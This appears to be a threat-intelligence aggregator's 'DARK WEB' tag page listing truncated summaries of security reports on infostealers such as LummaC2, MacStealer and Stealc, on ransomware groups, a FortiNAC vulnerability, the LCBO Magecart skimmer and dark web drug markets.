LummaC2 is a new Infostealer sold on the dark web and spread by a threat group disguising it as illegal cracks and keygens. The campaign uses obfuscation, anti-sandbox checks, and C2 communications to exfiltrate data from targeted browsers and wallet apps. #Lu…
Tag: DARK WEB
MacStealer is a macOS stealer distributed via DMG that is controlled over Telegram, marking a new platform for stealer operations. It exfiltrates browser credentials, Keychain data, and files, sending stolen data via HTTP POST to a C2 and to Telegram channels/…
Trigona is a newly observed ransomware strain that security researchers first noted in Oct 2022 and was highly active in Dec 2022 with at least 15 victims across multiple industries. The operation uses HTML Application ransom notes with embedded JavaScript con…
Fortinet’s FortiGuard Labs’ Ransomware Roundup highlights two notable variants, Sirattacker and ALC, detailing their execution methods, ransom notes, and observed activity, including Bitcoin wallet interactions associated with the Sirattacker actor. The report…
Publicly released PoC for CVE-2022-39952 in FortiNAC enables threat actors to perform arbitrary file writes and potentially deploy web shells on vulnerable systems. The article highlights exposed FortiNAC instances, affected versions, and urges timely patching…
Stealc is a copycat information stealer advertised by Plymouth, drawing on Vidar, Raccoon, Mars and Redline. Sekoia.io analyzes its features, C2 communications, infection chain, and ongoing development, noting its rapid uptake among cybercriminals. #Stealc #Vi…
SentinelLabs detected a cluster of virtualized .NET loaders, named MalVirt, distributed via malvertising to deliver Formbook/XLoader infostealer payloads. The loaders use KoiVM-based virtualization and anti-analysis techniques, rely on a Windows Process Explor…
INKY uncovered a widespread Southwest Airlines credential harvesting phishing campaign that uses newly created domains to lure victims via a fake survey and gift-card offer. The scam escalates from impersonation and enticing branding to a credential-harvesting…
Resecurity identifies Nevada Ransomware as a relatively new ransomware family with an active affiliate platform on the RAMP underground. It operates a Windows and Linux/ESXi locker, supports post-exploitation workflows, and uses a TOR-based affiliate portal to…
Analyst1 presents a human-centric examination of the LockBit operation, tracing its evolution from ABCD to LockBit Red/Black and detailing the personalities, inter-gang dynamics, and operational innovations behind one of the world’s most prolific ransomware or…
The LCBO disclosed a cybersecurity incident in January 2023 involving a web skimmer designed to steal customer payment information from LCBO.com during checkout. Experts identified the skimmer as Magecart, loaded via a Base64-encoded Google Tag Manager snippet…
The article surveys how major dark Web drug markets have become a multi-hundred-million-dollar ecosystem, with a shift toward mobile apps and instant messaging for buying, selling, and coordinating deliveries. It highlights ongoing wars for market share (Hydra…
CRIL researchers uncovered LummaC2 Stealer, a 32-bit GUI malware targeting Chromium and Mozilla browsers to exfiltrate crypto wallets, browser extensions, and 2FA data. The campaign includes a Russian-language seller site, Telegram channels, and active C2 serv…
CRIL uncovers Alibaba2044’s PureLogs stealer and related PureCoder malware offerings being sold in darkweb forums, with a December 14, 2022 spam campaign targeting Italian users. The piece details multiple tools (PureLogs, PureCrypter, PureMiner, BlueLoader, P…
CYFIRMA tracks three campaigns—Evian, UNC064, and Siberian bear—believed to be operated by Russian-speaking threat groups on behalf of their Russian masters, targeting various industries and geographies for espionage, financial gains, and reconnaissance. The r…